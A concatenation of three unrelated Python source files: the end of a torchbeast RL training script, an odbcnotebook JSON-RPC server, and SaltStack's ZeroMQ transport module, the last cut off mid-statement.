name="learner-thread-%i" % i, args=( flags, learner_queue, model, actor_model, optimizer, scheduler, stats, plogger, ), ) for i in range(flags.num_learner_threads) ] inference_threads = [ threading.Thread( target=inference, name="inference-thread-%i" % i, args=(flags, inference_batcher, actor_model), ) for i in range(flags.num_inference_threads) ] actorpool_thread.start() for t in learner_threads + inference_threads: t.start() def checkpoint(): if flags.disable_checkpoint: return logging.info("Saving checkpoint to %s", checkpointpath) torch.save( { "model_state_dict": model.state_dict(), "optimizer_state_dict": optimizer.state_dict(), "scheduler_state_dict": scheduler.state_dict(), "stats": stats, "flags": vars(flags), }, checkpointpath, ) def format_value(x): return f"{x:1.5}" if isinstance(x, float) else str(x) try: last_checkpoint_time = timeit.default_timer() while True: start_time = timeit.default_timer() start_step = stats.get("step", 0) if start_step >= flags.total_steps: break time.sleep(5) end_step = stats.get("step", 0) if timeit.default_timer() - last_checkpoint_time > 10 * 60: # Save every 10 min. checkpoint() last_checkpoint_time = timeit.default_timer() logging.info( "Step %i @ %.1f SPS. Inference batcher size: %i." " Learner queue size: %i." 
" Other stats: (%s)", end_step, (end_step - start_step) / (timeit.default_timer() - start_time), inference_batcher.size(), learner_queue.size(), ", ".join( f"{key} = {format_value(value)}" for key, value in stats.items() ), ) except KeyboardInterrupt: pass # Close properly. else: logging.info("Learning finished after %i steps.", stats["step"]) checkpoint() # Done with learning. Stop all the ongoing work. inference_batcher.close() learner_queue.close() actorpool_thread.join() for t in learner_threads + inference_threads: t.join() def test(flags): raise NotImplementedError() def main(flags): if not flags.pipes_basename.startswith("unix:"): raise Exception("--pipes_basename has to be of the form unix:/some/path.") if flags.start_servers: command = [ "python", "-m", "torchbeast.polybeast_env", f"--num_servers={flags.num_actors}", f"--pipes_basename={flags.pipes_basename}", f"--env={flags.env}", ] logging.info("Starting servers with command: " + " ".join(command)) server_proc = subprocess.Popen(command) if flags.mode == "train": if flags.write_profiler_trace: logging.info("Running with profiler.") with torch.autograd.profiler.profile() as prof: train(flags) filename = "chrome-%s.trace" % time.strftime("%Y%m%d-%H%M%S") logging.info("Writing profiler trace to '%s.gz'", filename) prof.export_chrome_trace(filename) os.system("gzip %s" % filename) else: train(flags) else: test(flags) if flags.start_servers: # Send Ctrl-c to servers. server_proc.send_signal(signal.SIGINT) if __name__ == "__main__": flags = parser.parse_args() main(flags)
server.py
from http.server import HTTPServer import ssl import sys import types import pyodbc from odbcnotebook import jsonrpc, odbc USAGE = 'odbcnotebook [-p PORT] [-c CONNECTION_STRING] [-s KEY CERT PASSWORD]' def wrap_ssl(runconfig, sock): """ Wraps a socket in an SSL context, if SSL is enabled. """ if runconfig.ssl: context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER) context.load_cert_chain(runconfig.certificate, runconfig.key, password=runconfig.keypassword) return context.wrap_socket(sock, server_side=True) else: return sock def parse_args(): """ Parses command-line arguments and returns a run configuration """ runconfig = types.SimpleNamespace() runconfig.ssl = False runconfig.port = None runconfig.connection_string = None i = 1 try: while i < len(sys.argv): arg = sys.argv[i] if arg == '-s': if runconfig.ssl: raise ValueError runconfig.ssl = True runconfig.certificate = sys.argv[i + 1] runconfig.key = sys.argv[i + 2] runconfig.keypassword = sys.argv[i + 3] i += 4 elif arg == '-p': if runconfig.port is not None: raise ValueError runconfig.port = int(sys.argv[i + 1]) if runconfig.port <= 0 or runconfig.port > 65536: raise ValueError i += 2 elif arg == '-c': if runconfig.connection_string is not None: raise ValueError runconfig.connection_string = sys.argv[i + 1] i += 2 else: raise ValueError if runconfig.connection_string is None: raise ValueError except (IndexError, ValueError): print(USAGE) sys.exit(1) if runconfig.port is None: runconfig.port = 1995 return runconfig def run_server(runconfig): """ Processes RPC requests until the server is closed """ try: connection = pyodbc.connect(runconfig.connection_string) except pyodbc.Error as err: print('Failed to open ODBC conncetion:', err) return odbc_inst = odbc.RPC(connection) handler_class = jsonrpc.make_json_handler(odbc_inst) server = HTTPServer(('localhost', runconfig.port), handler_class) def shutdown(): # Since HTTPServer.shutdown blocks until the server shuts down, the # only way to call it is from a thread that isn't running that HTTPServer import threading threading.Thread(target=server.shutdown).start() odbc_inst.set_shutdown(shutdown) server.socket = wrap_ssl(runconfig, server.socket) server.serve_forever() def main(): """ Entry point """ run_server(parse_args())
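# --- Illustrative sketch (added; not part of server.py) ---
# Standalone demonstration of the shutdown pattern used in run_server() above:
# HTTPServer.shutdown() blocks until serve_forever() has stopped, so it must be
# called from a different thread than the one running the serve loop (which is
# why the shutdown() helper above spawns a Thread just to call it). The handler
# name and port choice below are made up for the example.
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer


class _PingHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        self.end_headers()
        self.wfile.write(b'ok')


srv = HTTPServer(('localhost', 0), _PingHandler)  # port 0 = any free port
serving = threading.Thread(target=srv.serve_forever)
serving.start()
# ... requests are handled here ...
srv.shutdown()       # safe: we are not on the serving thread
serving.join()
srv.server_close()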
zeromq.py
# -*- coding: utf-8 -*- ''' Zeromq transport classes ''' # Import Python Libs from __future__ import absolute_import, print_function, unicode_literals import os import sys import copy import errno import signal import hashlib import logging import weakref import threading from random import randint # Import Salt Libs import salt.auth import salt.crypt import salt.log.setup import salt.utils.event import salt.utils.files import salt.utils.minions import salt.utils.process import salt.utils.stringutils import salt.utils.verify import salt.utils.zeromq import salt.payload import salt.transport.client import salt.transport.server import salt.transport.mixins.auth from salt.ext import six from salt.exceptions import SaltReqTimeoutError, SaltException from salt._compat import ipaddress from salt.utils.zeromq import zmq, ZMQDefaultLoop, install_zmq, ZMQ_VERSION_INFO, LIBZMQ_VERSION_INFO import zmq.error import zmq.eventloop.ioloop import zmq.eventloop.zmqstream try: import zmq.utils.monitor HAS_ZMQ_MONITOR = True except ImportError: HAS_ZMQ_MONITOR = False # Import Tornado Libs import tornado import tornado.gen import tornado.concurrent # Import third party libs try: from M2Crypto import RSA HAS_M2 = True except ImportError: HAS_M2 = False try: from Cryptodome.Cipher import PKCS1_OAEP except ImportError: from Crypto.Cipher import PKCS1_OAEP log = logging.getLogger(__name__) def _get_master_uri(master_ip, master_port, source_ip=None, source_port=None): ''' Return the ZeroMQ URI to connect the Minion to the Master. It supports different source IP / port, given the ZeroMQ syntax: // Connecting using a IP address and bind to an IP address rc = zmq_connect(socket, "tcp://192.168.1.17:5555;192.168.1.1:5555"); assert (rc == 0); Source: http://api.zeromq.org/4-1:zmq-tcp ''' from salt.utils.zeromq import ip_bracket master_uri = 'tcp://{master_ip}:{master_port}'.format( master_ip=ip_bracket(master_ip), master_port=master_port) if source_ip or source_port: if LIBZMQ_VERSION_INFO >= (4, 1, 6) and ZMQ_VERSION_INFO >= (16, 0, 1): # The source:port syntax for ZeroMQ has been added in libzmq 4.1.6 # which is included in the pyzmq wheels starting with 16.0.1. if source_ip and source_port: master_uri = 'tcp://{source_ip}:{source_port};{master_ip}:{master_port}'.format( source_ip=ip_bracket(source_ip), source_port=source_port, master_ip=ip_bracket(master_ip), master_port=master_port) elif source_ip and not source_port: master_uri = 'tcp://{source_ip}:0;{master_ip}:{master_port}'.format( source_ip=ip_bracket(source_ip), master_ip=ip_bracket(master_ip), master_port=master_port) elif source_port and not source_ip: ip_any = '0.0.0.0' if ipaddress.ip_address(master_ip).version == 4 else ip_bracket('::') master_uri = 'tcp://{ip_any}:{source_port};{master_ip}:{master_port}'.format( ip_any=ip_any, source_port=source_port, master_ip=ip_bracket(master_ip), master_port=master_port) else: log.warning('Unable to connect to the Master using a specific source IP / port') log.warning('Consider upgrading to pyzmq >= 16.0.1 and libzmq >= 4.1.6') log.warning('Specific source IP / port for connecting to master returner port: configuraion ignored') return master_uri class AsyncZeroMQReqChannel(salt.transport.client.ReqChannel): ''' Encapsulate sending routines to ZeroMQ. 
ZMQ Channels default to 'crypt=aes' ''' # This class is only a singleton per minion/master pair # mapping of io_loop -> {key -> channel} instance_map = weakref.WeakKeyDictionary() def __new__(cls, opts, **kwargs): ''' Only create one instance of channel per __key() ''' # do we have any mapping for this io_loop io_loop = kwargs.get('io_loop') if io_loop is None: install_zmq() io_loop = ZMQDefaultLoop.current() if io_loop not in cls.instance_map: cls.instance_map[io_loop] = weakref.WeakValueDictionary() loop_instance_map = cls.instance_map[io_loop] key = cls.__key(opts, **kwargs) obj = loop_instance_map.get(key) if obj is None: log.debug('Initializing new AsyncZeroMQReqChannel for %s', key) # we need to make a local variable for this, as we are going to store # it in a WeakValueDictionary-- which will remove the item if no one # references it-- this forces a reference while we return to the caller obj = object.__new__(cls) obj.__singleton_init__(opts, **kwargs) loop_instance_map[key] = obj log.trace('Inserted key into loop_instance_map id %s for key %s and process %s', id(loop_instance_map), key, os.getpid()) else: log.debug('Re-using AsyncZeroMQReqChannel for %s', key) return obj def __deepcopy__(self, memo): cls = self.__class__ result = cls.__new__(cls, copy.deepcopy(self.opts, memo)) # pylint: disable=too-many-function-args memo[id(self)] = result for key in self.__dict__: if key in ('_io_loop',): continue # The _io_loop has a thread Lock which will fail to be deep # copied. Skip it because it will just be recreated on the # new copy. if key == 'message_client': # Recreate the message client because it will fail to be deep # copied. The reason is the same as the io_loop skip above. setattr(result, key, AsyncReqMessageClientPool(result.opts, args=(result.opts, self.master_uri,), kwargs={'io_loop': self._io_loop})) continue setattr(result, key, copy.deepcopy(self.__dict__[key], memo)) return result @classmethod def __key(cls, opts, **kwargs): return (opts['pki_dir'], # where the keys are stored opts['id'], # minion ID kwargs.get('master_uri', opts.get('master_uri')), # master ID kwargs.get('crypt', 'aes'), # TODO: use the same channel for crypt ) # has to remain empty for singletons, since __init__ will *always* be called def __init__(self, opts, **kwargs): pass # an init for the singleton instance to call def __singleton_init__(self, opts, **kwargs): self.opts = dict(opts) self.ttype = 'zeromq' # crypt defaults to 'aes' self.crypt = kwargs.get('crypt', 'aes') if 'master_uri' in kwargs: self.opts['master_uri'] = kwargs['master_uri'] self._io_loop = kwargs.get('io_loop') if self._io_loop is None: install_zmq() self._io_loop = ZMQDefaultLoop.current() if self.crypt != 'clear': # we don't need to worry about auth as a kwarg, since its a singleton self.auth = salt.crypt.AsyncAuth(self.opts, io_loop=self._io_loop) log.debug('Connecting the Minion to the Master URI (for the return server): %s', self.master_uri) self.message_client = AsyncReqMessageClientPool(self.opts, args=(self.opts, self.master_uri,), kwargs={'io_loop': self._io_loop}) def __del__(self): ''' Since the message_client creates sockets and assigns them to the IOLoop we have to specifically destroy them, since we aren't the only ones with references to the FDs ''' if hasattr(self, 'message_client'): self.message_client.destroy() @property def master_uri(self): if 'master_uri' in self.opts: return self.opts['master_uri'] # if by chance master_uri is not there.. 
if 'master_ip' in self.opts: return _get_master_uri(self.opts['master_ip'], self.opts['master_port'], source_ip=self.opts.get('source_ip'), source_port=self.opts.get('source_ret_port')) # if we've reached here something is very abnormal raise SaltException('ReqChannel: missing master_uri/master_ip in self.opts') def _package_load(self, load): return { 'enc': self.crypt, 'load': load, } @tornado.gen.coroutine def crypted_transfer_decode_dictentry(self, load, dictkey=None, tries=3, timeout=60): if not self.auth.authenticated: # Return control back to the caller, continue when authentication succeeds yield self.auth.authenticate() # Return control to the caller. When send() completes, resume by populating ret with the Future.result ret = yield self.message_client.send( self._package_load(self.auth.crypticle.dumps(load)), timeout=timeout, tries=tries, ) key = self.auth.get_keys() if 'key' not in ret: # Reauth in the case our key is deleted on the master side. yield self.auth.authenticate() ret = yield self.message_client.send( self._package_load(self.auth.crypticle.dumps(load)), timeout=timeout, tries=tries, ) if HAS_M2: aes = key.private_decrypt(ret['key'], RSA.pkcs1_oaep_padding) else: cipher = PKCS1_OAEP.new(key) aes = cipher.decrypt(ret['key']) pcrypt = salt.crypt.Crypticle(self.opts, aes) data = pcrypt.loads(ret[dictkey]) if six.PY3: data = salt.transport.frame.decode_embedded_strs(data) raise tornado.gen.Return(data) @tornado.gen.coroutine def _crypted_transfer(self, load, tries=3, timeout=60, raw=False): ''' Send a load across the wire, with encryption In case of authentication errors, try to renegotiate authentication and retry the method. Indeed, we can fail too early in case of a master restart during a minion state execution call :param dict load: A load to send across the wire :param int tries: The number of times to make before failure :param int timeout: The number of seconds on a response before failing ''' @tornado.gen.coroutine def _do_transfer(): # Yield control to the caller. When send() completes, resume by populating data with the Future.result data = yield self.message_client.send( self._package_load(self.auth.crypticle.dumps(load)), timeout=timeout, tries=tries, ) # we may not have always data # as for example for saltcall ret submission, this is a blind # communication, we do not subscribe to return events, we just # upload the results to the master if data: data = self.auth.crypticle.loads(data, raw) if six.PY3 and not raw: data = salt.transport.frame.decode_embedded_strs(data) raise tornado.gen.Return(data) if not self.auth.authenticated: # Return control back to the caller, resume when authentication succeeds yield self.auth.authenticate() try: # We did not get data back the first time. Retry. 
ret = yield _do_transfer() except salt.crypt.AuthenticationError: # If auth error, return control back to the caller, continue when authentication succeeds yield self.auth.authenticate() ret = yield _do_transfer() raise tornado.gen.Return(ret) @tornado.gen.coroutine def _uncrypted_transfer(self, load, tries=3, timeout=60): ''' Send a load across the wire in cleartext :param dict load: A load to send across the wire :param int tries: The number of times to make before failure :param int timeout: The number of seconds on a response before failing ''' ret = yield self.message_client.send( self._package_load(load), timeout=timeout, tries=tries, ) raise tornado.gen.Return(ret) @tornado.gen.coroutine def send(self, load, tries=3, timeout=60, raw=False): ''' Send a request, return a future which will complete when we send the message ''' if self.crypt == 'clear': ret = yield self._uncrypted_transfer(load, tries=tries, timeout=timeout) else: ret = yield self._crypted_transfer(load, tries=tries, timeout=timeout, raw=raw) raise tornado.gen.Return(ret) class AsyncZeroMQPubChannel(salt.transport.mixins.auth.AESPubClientMixin, salt.transport.client.AsyncPubChannel): ''' A transport channel backed by ZeroMQ for a Salt Publisher to use to publish commands to connected minions ''' def __init__(self, opts, **kwargs): self.opts = opts self.ttype = 'zeromq' self.io_loop = kwargs.get('io_loop') if self.io_loop is None: install_zmq() self.io_loop = ZMQDefaultLoop.current() self.hexid = hashlib.sha1(salt.utils.stringutils.to_bytes(self.opts['id'])).hexdigest() self.auth = salt.crypt.AsyncAuth(self.opts, io_loop=self.io_loop) self.serial = salt.payload.Serial(self.opts) self.context = zmq.Context() self._socket = self.context.socket(zmq.SUB) if self.opts['zmq_filtering']: # TODO: constants file for "broadcast" self._socket.setsockopt(zmq.SUBSCRIBE, b'broadcast') self._socket.setsockopt( zmq.SUBSCRIBE, salt.utils.stringutils.to_bytes(self.hexid) ) else: self._socket.setsockopt(zmq.SUBSCRIBE, b'') self._socket.setsockopt(zmq.IDENTITY, salt.utils.stringutils.to_bytes(self.opts['id'])) # TODO: cleanup all the socket opts stuff if hasattr(zmq, 'TCP_KEEPALIVE'): self._socket.setsockopt( zmq.TCP_KEEPALIVE, self.opts['tcp_keepalive'] ) self._socket.setsockopt( zmq.TCP_KEEPALIVE_IDLE, self.opts['tcp_keepalive_idle'] ) self._socket.setsockopt( zmq.TCP_KEEPALIVE_CNT, self.opts['tcp_keepalive_cnt'] ) self._socket.setsockopt( zmq.TCP_KEEPALIVE_INTVL, self.opts['tcp_keepalive_intvl'] ) recon_delay = self.opts['recon_default'] if self.opts['recon_randomize']: recon_delay = randint(self.opts['recon_default'], self.opts['recon_default'] + self.opts['recon_max']) log.debug( "Generated random reconnect delay between '%sms' and '%sms' (%s)", self.opts['recon_default'], self.opts['recon_default'] + self.opts['recon_max'], recon_delay ) log.debug("Setting zmq_reconnect_ivl to '%sms'", recon_delay) self._socket.setsockopt(zmq.RECONNECT_IVL, recon_delay) if hasattr(zmq, 'RECONNECT_IVL_MAX'): log.debug( "Setting zmq_reconnect_ivl_max to '%sms'", self.opts['recon_default'] + self.opts['recon_max'] ) self._socket.setsockopt( zmq.RECONNECT_IVL_MAX, self.opts['recon_max'] ) if (self.opts['ipv6'] is True or ':' in self.opts['master_ip']) and hasattr(zmq, 'IPV4ONLY'): # IPv6 sockets work for both IPv6 and IPv4 addresses self._socket.setsockopt(zmq.IPV4ONLY, 0) if HAS_ZMQ_MONITOR and self.opts['zmq_monitor']: self._monitor = ZeroMQSocketMonitor(self._socket) self._monitor.start_io_loop(self.io_loop) def destroy(self): if hasattr(self, 
'_monitor') and self._monitor is not None:
            self._monitor.stop()
            self._monitor = None
        if hasattr(self, '_stream'):
            if ZMQ_VERSION_INFO < (14, 3, 0):
                # stream.close() doesn't work properly on pyzmq < 14.3.0
                self._stream.io_loop.remove_handler(self._stream.socket)
                self._stream.socket.close(0)
            else:
                self._stream.close(0)
        elif hasattr(self, '_socket'):
            self._socket.close(0)
        if hasattr(self, 'context') and self.context.closed is False:
            self.context.term()

    def __del__(self):
        self.destroy()

    # TODO: this is the time to see if we are connected, maybe use the req channel to guess?
    @tornado.gen.coroutine
    def connect(self):
        if not self.auth.authenticated:
            yield self.auth.authenticate()
        self.publish_port = self.auth.creds['publish_port']
        log.debug('Connecting the Minion to the Master publish port, using the URI: %s', self.master_pub)
        self._socket.connect(self.master_pub)

    @property
    def master_pub(self):
        '''
        Return the master publish port
        '''
        return _get_master_uri(self.opts['master_ip'],
                               self.publish_port,
                               source_ip=self.opts.get('source_ip'),
                               source_port=self.opts.get('source_publish_port'))

    @tornado.gen.coroutine
    def _decode_messages(self, messages):
        '''
        Take the zmq messages, decrypt/decode them into a payload

        :param list messages: A list of messages to be decoded
        '''
        messages_len = len(messages)
        # if it was one message, then its old style
        if messages_len == 1:
            payload = self.serial.loads(messages[0])
        # 2 includes a header which says who should do it
        elif messages_len == 2:
            if messages[0] not in ('broadcast', self.hexid):
                log.debug('Publish received for not this minion: %s', messages[0])
                raise tornado.gen.Return(None)
            payload = self.serial.loads(messages[1])
        else:
            raise Exception(('Invalid number of messages ({0}) in zeromq pub '
                             'message from master').format(messages_len))
        # Yield control back to the caller.
When the payload has been decoded, assign # the decoded payload to 'ret' and resume operation ret = yield self._decode_payload(payload) raise tornado.gen.Return(ret) @property def stream(self): ''' Return the current zmqstream, creating one if necessary ''' if not hasattr(self, '_stream'): self._stream = zmq.eventloop.zmqstream.ZMQStream(self._socket, io_loop=self.io_loop) return self._stream def on_recv(self, callback): ''' Register a callback for received messages (that we didn't initiate) :param func callback: A function which should be called when data is received ''' if callback is None: return self.stream.on_recv(None) @tornado.gen.coroutine def wrap_callback(messages): payload = yield self._decode_messages(messages) if payload is not None: callback(payload) return self.stream.on_recv(wrap_callback) class ZeroMQReqServerChannel(salt.transport.mixins.auth.AESReqServerMixin, salt.transport.server.ReqServerChannel): def __init__(self, opts): salt.transport.server.ReqServerChannel.__init__(self, opts) self._closing = False def zmq_device(self): ''' Multiprocessing target for the zmq queue device ''' self.__setup_signals() salt.utils.process.appendproctitle('MWorkerQueue') self.context = zmq.Context(self.opts['worker_threads']) # Prepare the zeromq sockets self.uri = 'tcp://{interface}:{ret_port}'.format(**self.opts) self.clients = self.context.socket(zmq.ROUTER) if self.opts['ipv6'] is True and hasattr(zmq, 'IPV4ONLY'): # IPv6 sockets work for both IPv6 and IPv4 addresses self.clients.setsockopt(zmq.IPV4ONLY, 0) self.clients.setsockopt(zmq.BACKLOG, self.opts.get('zmq_backlog', 1000)) self._start_zmq_monitor() self.workers = self.context.socket(zmq.DEALER) if self.opts.get('ipc_mode', '') == 'tcp': self.w_uri = 'tcp://127.0.0.1:{0}'.format( self.opts.get('tcp_master_workers', 4515) ) else: self.w_uri = 'ipc://{0}'.format( os.path.join(self.opts['sock_dir'], 'workers.ipc') ) log.info('Setting up the master communication server') self.clients.bind(self.uri) self.workers.bind(self.w_uri) while True: if self.clients.closed or self.workers.closed: break try: zmq.device(zmq.QUEUE, self.clients, self.workers) except zmq.ZMQError as exc: if exc.errno == errno.EINTR: continue raise exc except (KeyboardInterrupt, SystemExit): break def close(self): ''' Cleanly shutdown the router socket ''' if self._closing: return log.info('MWorkerQueue under PID %s is closing', os.getpid()) self._closing = True # pylint: disable=E0203 if getattr(self, '_monitor', None) is not None: self._monitor.stop() self._monitor = None if getattr(self, '_w_monitor', None) is not None: self._w_monitor.stop() self._w_monitor = None if hasattr(self, 'clients') and self.clients.closed is False: self.clients.close() if hasattr(self, 'workers') and self.workers.closed is False: self.workers.close() if hasattr(self, 'stream'): self.stream.close() if hasattr(self, '_socket') and self._socket.closed is False: self._socket.close() if hasattr(self, 'context') and self.context.closed is False: self.context.term() # pylint: enable=E0203 def pre_fork(self, process_manager): ''' Pre-fork we need to create the zmq router device :param func process_manager: An instance of salt.utils.process.ProcessManager ''' salt.transport.mixins.auth.AESReqServerMixin.pre_fork(self, process_manager) process_manager.add_process(self.zmq_device) def _start_zmq_monitor(self): ''' Starts ZMQ monitor for debugging purposes. 
:return: ''' # Socket monitor shall be used the only for debug # purposes so using threading doesn't look too bad here if HAS_ZMQ_MONITOR and self.opts['zmq_monitor']: log.debug('Starting ZMQ monitor') import threading self._w_monitor = ZeroMQSocketMonitor(self._socket) threading.Thread(target=self._w_monitor.start_poll).start() log.debug('ZMQ monitor has been started started') def post_fork(self, payload_handler, io_loop): ''' After forking we need to create all of the local sockets to listen to the router :param func payload_handler: A function to called to handle incoming payloads as they are picked up off the wire :param IOLoop io_loop: An instance of a Tornado IOLoop, to handle event scheduling ''' self.payload_handler = payload_handler self.io_loop = io_loop self.context = zmq.Context(1) self._socket = self.context.socket(zmq.REP) self._start_zmq_monitor() if self.opts.get('ipc_mode', '') == 'tcp': self.w_uri = 'tcp://127.0.0.1:{0}'.format( self.opts.get('tcp_master_workers', 4515) ) else: self.w_uri = 'ipc://{0}'.format( os.path.join(self.opts['sock_dir'], 'workers.ipc') ) log.info('Worker binding to socket %s', self.w_uri) self._socket.connect(self.w_uri) salt.transport.mixins.auth.AESReqServerMixin.post_fork(self, payload_handler, io_loop) self.stream = zmq.eventloop.zmqstream.ZMQStream(self._socket, io_loop=self.io_loop) self.stream.on_recv_stream(self.handle_message) @tornado.gen.coroutine def handle_message(self, stream, payload): ''' Handle incoming messages from underlying TCP streams :stream ZMQStream stream: A ZeroMQ stream. See http://zeromq.github.io/pyzmq/api/generated/zmq.eventloop.zmqstream.html :param dict payload: A payload to process ''' try: payload = self.serial.loads(payload[0]) payload = self._decode_payload(payload) except Exception as exc: exc_type = type(exc).__name__ if exc_type == 'AuthenticationError': log.debug( 'Minion failed to auth to master. Since the payload is ' 'encrypted, it is not known which minion failed to ' 'authenticate. It is likely that this is a transient ' 'failure due to the master rotating its public key.' ) else: log.error('Bad load from minion: %s: %s', exc_type, exc) stream.send(self.serial.dumps('bad load')) raise tornado.gen.Return() # TODO helper functions to normalize payload? if not isinstance(payload, dict) or not isinstance(payload.get('load'), dict): log.error('payload and load must be a dict. 
Payload was: %s and load was %s', payload, payload.get('load')) stream.send(self.serial.dumps('payload and load must be a dict')) raise tornado.gen.Return() try: id_ = payload['load'].get('id', '') if str('\0') in id_: log.error('Payload contains an id with a null byte: %s', payload) stream.send(self.serial.dumps('bad load: id contains a null byte')) raise tornado.gen.Return() except TypeError: log.error('Payload contains non-string id: %s', payload) stream.send(self.serial.dumps('bad load: id {0} is not a string'.format(id_))) raise tornado.gen.Return() # intercept the "_auth" commands, since the main daemon shouldn't know # anything about our key auth if payload['enc'] == 'clear' and payload.get('load', {}).get('cmd') == '_auth': stream.send(self.serial.dumps(self._auth(payload['load']))) raise tornado.gen.Return() # TODO: test try: # Take the payload_handler function that was registered when we created the channel # and call it, returning control to the caller until it completes ret, req_opts = yield self.payload_handler(payload) except Exception as e: # always attempt to return an error to the minion stream.send('Some exception handling minion payload') log.error('Some exception handling a payload from minion', exc_info=True) raise tornado.gen.Return() req_fun = req_opts.get('fun', 'send') if req_fun == 'send_clear': stream.send(self.serial.dumps(ret)) elif req_fun == 'send': stream.send(self.serial.dumps(self.crypticle.dumps(ret))) elif req_fun == 'send_private': stream.send(self.serial.dumps(self._encrypt_private(ret, req_opts['key'], req_opts['tgt'], ))) else: log.error('Unknown req_fun %s', req_fun) # always attempt to return an error to the minion stream.send('Server-side exception handling payload') raise tornado.gen.Return() def __setup_signals(self): signal.signal(signal.SIGINT, self._handle_signals) signal.signal(signal.SIGTERM, self._handle_signals) def _handle_signals(self, signum, sigframe): msg = '{0} received a '.format(self.__class__.__name__) if signum == signal.SIGINT: msg += 'SIGINT' elif signum == signal.SIGTERM: msg += 'SIGTERM' msg += '. Exiting' log.debug(msg) self.close() sys.exit(salt.defaults.exitcodes.EX_OK) def _set_tcp_keepalive(zmq_socket, opts): ''' Ensure that TCP keepalives are set as specified in "opts". Warning: Failure to set TCP keepalives on the salt-master can result in not detecting the loss of a minion when the connection is lost or when it's host has been terminated without first closing the socket. Salt's Presence System depends on this connection status to know if a minion is "present". Warning: Failure to set TCP keepalives on minions can result in frequent or unexpected disconnects! ''' if hasattr(zmq, 'TCP_KEEPALIVE') and opts: if 'tcp_keepalive' in opts: zmq_socket.setsockopt( zmq.TCP_KEEPALIVE, opts['tcp_keepalive'] ) if 'tcp_keepalive_idle' in opts: zmq_socket.setsockopt( zmq.TCP_KEEPALIVE_IDLE, opts['tcp_keepalive_idle'] ) if 'tcp_keepalive_cnt' in opts: zmq_socket.setsockopt( zmq.TCP_KEEPALIVE_CNT, opts['tcp_keepalive_cnt'] ) if 'tcp_keepalive_intvl' in opts: zmq_socket.setsockopt( zmq.TCP_KEEPALIVE_INTVL, opts['tcp_keepalive_intvl'] ) class ZeroMQPubServerChannel(salt.transport.server.PubServerChannel): ''' Encapsulate synchronous operations for a publisher channel ''' _sock_data = threading.local() def __init__(self, opts): self.opts = opts self.serial = salt.payload.Serial(self.opts) # TODO: in init? 
self.ckminions = salt.utils.minions.CkMinions(self.opts) def connect(self): return tornado.gen.sleep(5) def _publish_daemon(self, log_queue=None): ''' Bind to the interface specified in the configuration file ''' salt.utils.process.appendproctitle(self.__class__.__name__) if log_queue: salt.log.setup.set_multiprocessing_logging_queue(log_queue) salt.log.setup.setup_multiprocessing_logging(log_queue) # Set up the context context = zmq.Context(1) # Prepare minion publish socket pub_sock = context.socket(zmq.PUB) _set_tcp_keepalive(pub_sock, self.opts) # if 2.1 >= zmq < 3.0, we only have one HWM setting try: pub_sock.setsockopt(zmq.HWM, self.opts.get('pub_hwm', 1000)) # in zmq >= 3.0, there are separate send and receive HWM settings except AttributeError: # Set the High Water Marks. For more information on HWM, see: # http://api.zeromq.org/4-1:zmq-setsockopt pub_sock.setsockopt(zmq.SNDHWM, self.opts.get('pub_hwm', 1000)) pub_sock.setsockopt(zmq.RCVHWM, self.opts.get('pub_hwm', 1000)) if self.opts['ipv6'] is True and hasattr(zmq, 'IPV4ONLY'): # IPv6 sockets work for both IPv6 and IPv4 addresses pub_sock.setsockopt(zmq.IPV4ONLY, 0) pub_sock.setsockopt(zmq.BACKLOG, self.opts.get('zmq_backlog', 1000)) pub_sock.setsockopt(zmq.LINGER, -1) pub_uri = 'tcp://{interface}:{publish_port}'.format(**self.opts) # Prepare minion pull socket pull_sock = context.socket(zmq.PULL) pull_sock.setsockopt(zmq.LINGER, -1) if self.opts.get('ipc_mode', '') == 'tcp': pull_uri = 'tcp://127.0.0.1:{0}'.format( self.opts.get('tcp_master_publish_pull', 4514) ) else: pull_uri = 'ipc://{0}'.format( os.path.join(self.opts['sock_dir'], 'publish_pull.ipc') ) salt.utils.zeromq.check_ipc_path_max_len(pull_uri) # Start the minion command publisher log.info('Starting the Salt Publisher on %s', pub_uri) pub_sock.bind(pub_uri) # Securely create socket log.info('Starting the Salt Puller on %s', pull_uri) with salt.utils.files.set_umask(0o177): pull_sock.bind(pull_uri) try: while True: # Catch and handle EINTR from when this process is sent # SIGUSR1 gracefully so we don't choke and die horribly try: log.debug('Publish daemon getting data from puller %s', pull_uri) package = pull_sock.recv() log.debug('Publish daemon received payload. 
size=%d', len(package)) unpacked_package = salt.payload.unpackage(package) if six.PY3: unpacked_package = salt.transport.frame.decode_embedded_strs(unpacked_package) payload = unpacked_package['payload'] log.trace('Accepted unpacked package from puller') if self.opts['zmq_filtering']: # if you have a specific topic list, use that if 'topic_lst' in unpacked_package: for topic in unpacked_package['topic_lst']: log.trace('Sending filtered data over publisher %s', pub_uri) # zmq filters are substring match, hash the topic # to avoid collisions htopic = hashlib.sha1(topic).hexdigest() pub_sock.send(htopic, flags=zmq.SNDMORE) pub_sock.send(payload) log.trace('Filtered data has been sent') # otherwise its a broadcast else: # TODO: constants file for "broadcast" log.trace('Sending broadcasted data over publisher %s', pub_uri) pub_sock.send('broadcast', flags=zmq.SNDMORE) pub_sock.send(payload) log.trace('Broadcasted data has been sent') else: log.trace('Sending ZMQ-unfiltered data over publisher %s', pub_uri) pub_sock.send(payload) log.trace('Unfiltered data has been sent') except zmq.ZMQError as exc: if exc.errno == errno.EINTR: continue raise exc except KeyboardInterrupt: log.trace('Publish daemon caught Keyboard interupt, tearing down') # Cleanly close the sockets if we're shutting down if pub_sock.closed is False: pub_sock.close() if pull_sock.closed is False: pull_sock.close() if context.closed is False: context.term() def pre_fork(self, process_manager, kwargs=None): ''' Do anything necessary pre-fork. Since this is on the master side this will primarily be used to create IPC channels and create our daemon process to do the actual publishing :param func process_manager: A ProcessManager, from salt.utils.process.ProcessManager ''' process_manager.add_process(self._publish_daemon, kwargs=kwargs) @property def pub_sock(self): ''' This thread's zmq publisher socket. This socket is stored on the class so that multiple instantiations in the same thread will re-use a single zmq socket. ''' try: return self._sock_data.sock except AttributeError: pass def pub_connect(self): ''' Create and connect this thread's zmq socket. If a publisher socket already exists "pub_close" is called before creating and connecting a new socket. ''' if self.pub_sock: self.pub_close() ctx = zmq.Context.instance() self._sock_data.sock = ctx.socket(zmq.PUSH) self.pub_sock.setsockopt(zmq.LINGER, -1) if self.opts.get('ipc_mode', '') == 'tcp': pull_uri = 'tcp://127.0.0.1:{0}'.format( self.opts.get('tcp_master_publish_pull', 4514) ) else: pull_uri = 